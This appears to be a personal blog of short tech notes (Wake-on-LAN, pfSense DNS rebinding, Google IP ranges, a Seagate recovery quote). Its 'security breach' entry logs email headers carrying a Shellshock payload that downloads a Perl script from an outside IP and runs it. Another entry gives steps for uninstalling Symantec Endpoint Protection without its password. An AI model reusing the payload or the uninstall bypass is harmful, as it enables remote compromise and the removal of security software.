Kategori: Kategorilenmemiş

  • security breach

    Return-Path:
    X-Original-To: root@localhost
    Delivered-To: root@localhost
    Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by alp2.nurettinalp.com (Postfix) with SMTP id 62AE9BC00E
    for ; Fri, 24 Oct 2014 20:34:30 +0300 (EEST)
    To:() { :; }; /bin/sh -c ‘/bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &’ &;
    References:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Cc:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    From:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Subject:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Date:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Message-ID:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Comments:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Keywords:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Resent-Date:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Resent-From:() { :; }; /bin/sh -c ‘cd /tmp ;curl -sO 178.254.31.165/ex.txt;lwp-download http://178.254.31.165/ex.txt;wget 178.254.31.165/ex.txt;fetch 178.254.31.165/ex.txt;perl ex.txt;rm -fr ex.*’ &;
    Resent-Message-Id: <20141024173430.62AE9BC00E@alp2.nurettinalp.com>

  • What Is the IP Address of Google?

    Web site administrators like to know the IP addresses used by Google when it is spidering. You can also sometimes use Google’s IP address to reach the site www.google.com if the domain cannot be contacted by its name.

    Answer:

    The following IP address ranges belong to Google:

    64.233.160.0 – 64.233.191.255
    66.102.0.0 – 66.102.15.255
    66.249.64.0 – 66.249.95.255
    72.14.192.0 – 72.14.255.255
    74.125.0.0 – 74.125.255.255
    209.85.128.0 – 209.85.255.255
    216.239.32.0 – 216.239.63.255
    Like many popular Web sites, Google utilizes multiple Internet servers to handle incoming requests to its Web site. Instead of entering http://www.google.com/ into the browser, a person can enter http:// followed by one of the above addresses, for example:
    http://74.125.224.72/
    Only certain addresses from Google’s pool will work depending on the physical location of the browser.
    Besides serving www.google.com, some of the Google’s IP addresses above are utilized by its Googlebot Web crawlers.

  • wake on lan programının çalışması için yapılması gerekenler.

    Listener unable to access port

    Wake-on-LAN uses UDP port 9 by default, to send WOL messages. This port is available for use on most Windows computers. However, if you have installed “Simple TCPIP services”, then Windows may be running the “discard” service. This service locks port 9 and will prevent the listener from connecting.

    Go to Control Panel and disable the “Simple TCP/IP Services” service. You should now be able to run WOL without any conflict. If you suspect another program is using port 9, you can run netstat to find out which application has the port locked. The command “Netstat -ab” will list all of the ports that are in use. This must be run as Administrator. Look for the line following UDP 0.0.0.0:9. That will be the name of the application that is using port 9.

  • seagate bozuk hard disk cevabı

    Good Day,

    Thank you for your data recovery inquiry.

    Currently Seagate is running a promotion on data recovery for all types of brands.
    Pricing for data recovery inclusive new hard drive for return media would be 499 € (pricing is pre-approved)

    Pricing is pre-approved on the basis of 70% of user data/specified files although we always strive for a full recovery.

    Prices are all based on a ‘no recovery, no fee’ basis; In the event that your data is not recoverable, there is no charge for the attempt; the only fee would be the 49 € evaluation fee which covers evaluation, reassembling and return shipping and handling cost.

    All works are carried out in our EMEA HQ in the Netherlands.

    In the event you can send the drive to the below mentioned address:

    SEAGATE RECOVERY SERVICES
    MARLON CRUDO
    TUPOLEVLAAN 109
    1119 PA SCHIPHOL-RIJK,
    NETHERLANDS

    Be aware of the fact we do not accept opened and/or manipulated devices anymore (hard drives, USB, RAID sytems, SSD etc.)

    In case we still receive them those devices will be sent back upon arrival.

    In case you have any more questions do not hesitate to contact me.

    Best regards,

    Marlon Crudo
    Inside Sales
    Seagate Recovery Services
    marlon.crudo@seagate.com

    Tel. 0031 20 3548102
    Tupolevlaan 109
    1119 PA Schiphol-Rijk
    The Netherlands

    Marlon Crudo

    Seagate Recovery Services
    ref:_00D00hhzl._50030Vgtkq:ref

  • symantec endpoint protection

    Sometimes its hard to uninstall SEP client if uninstall password is lost or SEPM is down.
    In such cases you may follow these steps

    Start – Run
    type smc -stop ( If it prompts for password; navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\SMC, delete the smcexit key and then type smc -stop)

    Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\SMC
    look for smcinstdata key; delete it

    go to add/remove program and uninstall the client..

    I know its simple procedure; but sure will help few :)

  • Unable to connect to RDP server remmina

    ~/.freerdp/known_hosts dosyasındaki girdiyi silince çalışıyor.

  • jitsi asterisk dtmf

    jitsi araçlar ayarlar hesaplar düzen bağlantı dtmf den sip bilgisini seçiyoruz.

  • pfsense DNS Rebinding Protections

    DNS Rebinding Protections

    pfSense includes two built in methods of protection against DNS rebinding attacks. These measures are described below.
    DNS forwarder

    The DNS forwarder (dnsmasq) uses the option –stop-dns-rebind by default, which rejects and logs addresses from upstream nameservers which are in the private IP ranges. In the most common usage, this is filtering DNS responses you’re getting from the Internet to prevent DNS rebinding attacks. Internet DNS responses should never come back with a private IP, hence it’s safest to block this.

    Note this is automatically overridden for domains in the DNS forwarder’s domain override list, as the most common usage of that functionality is to resolve internal DNS hostnames.
    Web interface protection

    For those not using the DNS forwarder and already having that protection, and as an additional layer of checks, the web interface will block attempts to access it via an unknown hostname. It will display “Potential DNS Rebind Attack Detected” and drop any request. By default, only the hostname and domain configured under System>General Setup are accepted. For instance if you have firewall.example.com configured as your system’s hostname, and you try to browse to it using fw1.example.com, that attempt will be rejected. You can add additional hostnames under System>Advanced, “Alternate Hostnames”.

    Note you can log in using the IP address of the system rather than the hostname should you find yourself unable to log in with this message. Then configure the hostname(s) accordingly and you will be able to log in using the hostname

  • file download manager

    http://pyload.org/
    flashgot

  • tp link TD-864W product wifi ap isolation support

    Dear customer

    I think I already found the root cause from your configuration. Please try to change some settings:
    Setup WLAN Advanced , change the Authentication Type to Shared Key.
    tp_link_td-864w